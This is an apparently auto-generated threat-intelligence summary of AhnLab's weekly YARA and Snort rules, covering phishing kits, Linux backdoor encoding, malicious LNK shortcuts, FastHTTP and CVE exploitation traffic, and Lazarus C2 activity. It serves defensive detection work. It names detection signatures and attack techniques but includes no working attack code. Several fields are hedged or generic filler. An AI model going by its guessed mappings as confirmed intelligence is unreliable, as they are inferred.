Full Report
The following is the information on Yara and Snort rules (week 5, January 2025) collected and shared by the AhnLab TIP service. 8 YARA Rules Detection name Description Source PK_DHL_Tracking DHL을 사칭하는 Phishing Kit 탐지 https://github.com/t4d/PhishingKit-Yara-Rules PK_ESL_sigmadev ESL Federal Credit Union을 사칭하는 Phishing Kit 탐지 https://github.com/t4d/PhishingKit-Yara-Rules PK_Nexi_mobile Nexi ( Nexi Pay) 를 사칭하는 Phishing Kit […]
Analysis Summary
This summary focuses on the detection artifacts (YARA and Snort rules) shared by AhnLab TIP for the week of January 2025, as these rules are designed to identify specific tools, malware techniques, and threat actor activity.
***
# Tool/Technique: Phishing Kits (Various Brands)
## Overview
A collection of Yara rules designed to detect files and structures associated with various phishing kits targeting financial institutions and shipping services, often used for credential harvesting.
## Technical Details
- Type: Technique/Malware (Phishing Infrastructure)
- Platform: Web Servers (Likely Windows/Linux hosting malicious websites)
- Capabilities: Mimic legitimate login pages (DHL, ESL Federal Credit Union, Nexi, Peapack-Gladstone, Wells Fargo) for credential theft.
- First Seen: N/A (Rules updated January 2025)
## MITRE ATT&CK Mapping
* T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- T1566.002 - Spearphishing Link (Most applicable for web-based kits)
## Functionality
### Core Capabilities
- Detecting specific file signatures related to phishing pages/scripts for DHL, ESL Federal Credit Union, Nexi Pay, Peapack-Gladstone Bank, and Wells Fargo.
### Advanced Features
- The rules specifically address different branding and structure variations across different targets.
## Indicators of Compromise
- File Hashes: N/A (YARA rule signatures only)
- File Names: N/A (Detection based on content signature)
- Registry Keys: N/A
- Network Indicators: The operation implies network communication for submitting stolen credentials, but specific C2s are not listed in the rule descriptions.
- Behavioral Indicators: Execution of web scripts designed to capture user input.
## Associated Threat Actors
- General cybercriminals focused on financial fraud and credential theft.
## Detection Methods
- Signature-based detection: Provided by specific YARA rules (e.g., `PK_DHL_Tracking`, `PK_WellsFargo_RD265`).
- Behavioral detection: Not explicitly covered by these specific YARA rules, but the resultant phishing activity would be detectable.
- YARA rules: `PK_*` rules detailed in the article.
## Mitigation Strategies
- User education regarding phishing attempts.
- Implementing strict network egress filtering.
- Utilizing anti-phishing browser extensions.
## Related Tools/Techniques
- Other credential harvesting frameworks.
***
# Tool/Technique: SEASPY/Bluez Backdoor Encoding Techniques
## Overview
YARA rules targeting specific execution techniques observed in Linux malware, specifically the SEASPY and Bluez backdoors, focusing on how binary data is encoded or processed on the stack.
## Technical Details
- Type: Malware Technique / Backdoor Artifacts
- Platform: Linux (LNX)
- Capabilities: Detection of distinctive binary encoding (`ByteEncoder`) and string handling (`StackString`) methods used by SEASPY and Bluez.
- First Seen: N/A (Rules updated January 2025)
## MITRE ATT&CK Mapping
* T1027 - Obfuscated Files or Information
* T1027.003 - Steganography (if used for hiding payloads)
* T1071 - Application Layer Protocol (Related to C2 communication)
* T1573 - Encrypted Channel (if encoding is related to C2)
## Functionality
### Core Capabilities
- Detecting suspicious binary encoding patterns indicative of the SEASPY or Bluez malware loaders/payloads.
- Detecting non-standard, stack-based string construction techniques used by these backdoors.
### Advanced Features
- Signatures are tuned to the low-level implementation details of known Linux backdoors.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A (Linux focus)
- Network Indicators: N/A (Detection focuses on binary artifacts)
- Behavioral Indicators: Suspicious execution patterns related to encoding/decoding routines.
## Associated Threat Actors
- Actors deploying SEASPY or Bluez backdoors (often associated with espionage or persistent access).
## Detection Methods
- Signature-based detection: Provided by YARA rules (`SUSP_LNX_ByteEncoder_Jan25`, `SUSP_LNX_StackString_Technique_Jan25`).
## Mitigation Strategies
- Strict integrity monitoring of system binaries on Linux hosts.
- Application whitelisting for running binaries.
## Related Tools/Techniques
- Other Linux malware families utilizing custom encoding/obfuscation.
***
# Tool/Technique: LNK File Suspicious Folder Usage
## Overview
A YARA rule designed to detect LNK (shortcut) files that employ suspicious folder paths in their target path, often a precursor to execution or lateral movement.
## Technical Details
- Type: Technique / Malicious Shortcut Artifact
- Platform: Windows
- Capabilities: Identifies LNK files referencing unusual or commonly abused paths for payload delivery.
- First Seen: N/A (Rule updated January 2025)
## MITRE ATT&CK Mapping
* T1204 - User Execution
* T1204.002 - Malicious File
* T1036 - Masquerading
* T1036.005 - Match Legitimate Name or Location
## Functionality
### Core Capabilities
- Detecting when shortcut files use sequences implying suspicious referencing or path traversal.
### Advanced Features
- Focuses on the structure of the shortcut file itself rather than the target payload.
## Indicators of Compromise
- File Hashes: N/A
- File Names: LNK files
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators: Creation or access of suspicious LNK files.
## Associated Threat Actors
- General threat actors using social engineering to trick users into executing malicious shortcuts.
## Detection Methods
- Signature-based detection: Provided by YARA rule (`SUSP_LNK_Suspicious_Folders_Jan25`).
## Mitigation Strategies
- Disabling the execution of LNK files via Group Policy where possible, or increasing user scrutiny of downloaded shortcuts.
- Implementing LNK file scanning on execution.
## Related Tools/Techniques
- Other shortcut file abuse (e.g., related to USB drops).
***
# Tool/Technique: FastHTTP Activity and Vulnerability Exploitation
## Overview
Snort rules indicating network traffic associated with the FastHTTP library (often utilized by bots or tools looking for high-performance, non-standard HTTP behavior) and signatures related to known product vulnerabilities.
## Technical Details
- Type: Tool/Framework Behavior & Vulnerability Exploitation
- Platform: Network Traffic / Web Servers
- Capabilities:
1. Detection User-Agents associated with **FastHTTP** usage (potential botnet activity or custom scanners).
2. Detection of **Denial of Service (DoS)** attempts linked to FastHTTP.
3. Signatures for specific **Vulnerability Exploitation Attempts** against Progress WhatsUp Gold, Nuuo NVR, and Axis Communications devices.
- First Seen: N/A (Rules updated January 2025)
## MITRE ATT&CK Mapping
* T1498 - Network Denial of Service (DoS)
* T1498.001 - Application Layer DoS (Related to FastHTTP detection)
* T1190 - Exploit Public-Facing Application (Vulnerability specific rules)
## Functionality
### Core Capabilities
- Identifying traffic signatures from the FastHTTP library used outbound or potentially scanning inbound.
- Recognizing specific exploit payloads targeting CVEs in network hardware and software (Progress WhatsUp Gold, Nuuo NVR, Axis cameras).
### Advanced Features
- Targeted detection of command injection attempts (`CVE-2018-10660` family for Axis).
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Specific User Agent strings (`ET USER_AGENTS FastHTTP User-Agent Observed Outbound`).
- Behavioral Indicators: Traffic patterns matching known DoS attacks or exploit signatures for the listed CVEs.
## Associated Threat Actors
- Botnet operators (FastHTTP detection).
- Vulnerability exploiters targeting unpatched infrastructure.
## Detection Methods
- Signature-based detection: Provided by Snort rules (e.g., `ET USER_AGENTS FastHTTP...`, `ET WEB_SPECIFIC_APPS ... CVE-XXXX`).
## Mitigation Strategies
- Patching vulnerable assets immediately (Progress WhatsUp Gold, Nuuo NVR, Axis Cameras).
- Rate-limiting or blocking traffic originating from typical FastHTTP scanning User-Agents.
## Related Tools/Techniques
- Other network DoS tools.
***
# Tool/Technique: Fake Microsoft Teams & Lazarus APT Activity
## Overview
Snort rules specifically alerting on network communication patterns matching known C2 activity related to fake Microsoft Teams malware and infrastructure used by the Lazarus Group.
## Technical Details
- Type: Malware Family / APT Activity
- Platform: Network Traffic / Endpoint Activity (Implied)
- Capabilities:
1. Detection of binary payloads or C2 requests related to malicious versions masquerading as Microsoft Teams.
2. Detection of specific command and control (C2) communication patterns attributed to the Lazarus APT group utilizing an "Electron" framework.
- First Seen: N/A (Rules updated January 2025)
## MITRE ATT&CK Mapping
* T1071 - Application Layer Protocol
* T1071.001 - Web Protocols (C2 traffic detection)
* T1566.001 - Spearphishing Attachment (If the VBS payload is delivered via email)
* T1059 - Command and Scripting Interpreter (VBS payload)
## Functionality
### Core Capabilities
- Identifying VBScript payloads inbound that suggest Teams credential theft attempts.
- Signature matching C2 beaconing associated with Lazarus infrastructure using Electron frameworks.
### Advanced Features
- Multi-stage detection targeting both the initial payload delivery (VBS) and subsequent C2 communication (Lazarus Electron).
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: C2 GET requests matching Lazarus patterns (`ET TROJAN Lazarus APT Electron CnC Activity (GET) M1/M2/M3`).
- Behavioral Indicators: Inbound VBS payloads disguised as Teams artifacts.
## Associated Threat Actors
- Lazarus Group (APT Organization).
- General malware distributors leveraging popular collaboration tools for distraction/payload delivery.
## Detection Methods
- Signature-based detection: Provided by Snort rules (`ET TROJAN Fake Microsoft Teams...`, `ET TROJAN Lazarus APT Electron...`).
## Mitigation Strategies
- Ensure Microsoft Teams clients are updated and sourced only from authoritative channels.
- Implement strict endpoint protection to block unauthorized script execution types (like VBScript).
- Monitor network connections matching Lazarus C2 signatures.
## Related Tools/Techniques
- Other social engineering campaigns using collaboration application impersonation.